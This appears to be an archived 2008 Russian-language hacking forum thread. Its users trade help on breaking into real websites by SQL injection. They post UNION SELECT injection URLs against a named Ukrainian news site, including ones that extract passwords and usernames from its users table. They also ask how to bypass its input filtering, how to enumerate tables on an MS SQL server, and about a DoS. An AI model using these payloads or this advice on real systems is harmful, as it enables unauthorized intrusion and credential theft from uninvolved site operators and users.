
18.04.2008, 12:20
|
|
Участник форума
Регистрация: 19.03.2008
Сообщений: 108
С нами:
9550090
Репутация:
137
|
|
Сообщение от Piflit
nicusor version() ?
mysql : 4.1.14
|
|
|

18.04.2008, 12:27
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
С нами:
10393869
Репутация:
2032
|
|
Сообщение от nicusor
mysql : 4.1.14
можно таблицы подобрать. руками или моим скриптом/прогой от SQL
|
|
|

19.04.2008, 14:09
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
Народ, естьу кого прога для перебора таблиц и колонок?)). Я так вручную заебусь перебирать.через браузер)) (1462 символа :РР).Есь скуля инж тул, но я хз как ей перебирать - какие-то пост параметры )
Последний раз редактировалось Велемир; 19.04.2008 в 14:12..
|
|
|

19.04.2008, 14:23
|
|
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
С нами:
10393869
Репутация:
2032
|
|
Сообщение от Велемир
Народ, естьу кого прога для перебора таблиц и колонок?)). Я так вручную заебусь перебирать.через браузер)) (1462 символа :РР).Есь скуля инж тул, но я хз как ей перебирать - какие-то пост параметры )
я не понял, тебе нужен подбор таблиц или количества выводимых полей?
|
|
|

19.04.2008, 14:26
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
перебор таблиц и колонок м мс скуля сервер:РР.Руками заебалсо уже.И ещё вот при отображении вывелась ошибка :
ADODB.Field ошибка '800a0bcd'
BOF èëè EOF èìååò çíà÷åíèå True, ëèáî òåêóùàÿ çàïèñü óäàëåíà. Äëÿ âûïîëíÿåìîé îïåðàöèè òðåáóåòñÿ òåêóùàÿ çàïèñü.
/item.asp, line 13
EOF обозначает конец файла как я помню, а что тут нипонятно)).Ещё и каракули стоят)).Есь какой-нить способ обойти кодировку,а то аес не пашет )
прочитал вот,и узнал,что эт знач юзера удалили))).Но пароль егр почему-то есть,а юзерид и ид_юзер выдают эту ошибку с концом файла)).И чтойто значит?
Последний раз редактировалось Велемир; 19.04.2008 в 15:12..
|
|
|

19.04.2008, 15:40
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
мм, это значит, что по твоему sql запросу не получено не каких данных, насчет аес? это T-SQL, там нет aes_decrypt
__________________
Карфаген должен быть разрушен...
|
|
|

19.04.2008, 17:57
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
Че делать то.....логина нет,а пароль есь? гггг))
|
|
|

19.04.2008, 22:49
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
Бля почему бенчмарком не задосить серв ?
И ещё вопрос: как тут обойти фильтрацию ? перепробывал уже всё,но даже ошибку при запросе к мускулу выдаёт одну и ту же.
http://www.a2k.org.ua/news.php?id=-31+union+select+1,2,3,char(117),char(115),char(114 ),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38--&lng=en
Удалось вывести только юзера, базу и версию(4.1 кстати).Пробывал и чар, и юрлкодирвоание,и аес, хекс - по нулям )(. Мошь есть у кого варианты что делать тут ?)
Последний раз редактировалось Велемир; 20.04.2008 в 00:44..
|
|
|

20.04.2008, 19:17
|
|
Участник форума
Регистрация: 29.11.2005
Сообщений: 122
С нами:
10761096
Репутация:
27
|
|
может я конечно ошибаюсь. но....
Код:
http://www.a2k.org.ua/news.php?id=-31+union+select+1,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+users+limit+1,1/*&lng=en
http://www.a2k.org.ua/news.php?id=-31+union+select+1,2,3,user,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+users+limit+0,1/*&lng=en
|
|
|

21.04.2008, 01:07
|
|
Познающий
Регистрация: 25.10.2007
Сообщений: 69
С нами:
9760218
Репутация:
52
|
|
Сообщение от Grema
может я конечно ошибаюсь. но....
Код:
http://www.a2k.org.ua/news.php?id=-31+union+select+1,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+users+limit+1,1/*&lng=en
http://www.a2k.org.ua/news.php?id=-31+union+select+1,2,3,user,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+users+limit+0,1/*&lng=en
А к чему &lng=en, у тебя стоит коментарий /* и все что после него пишеться будет просто опускаться.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|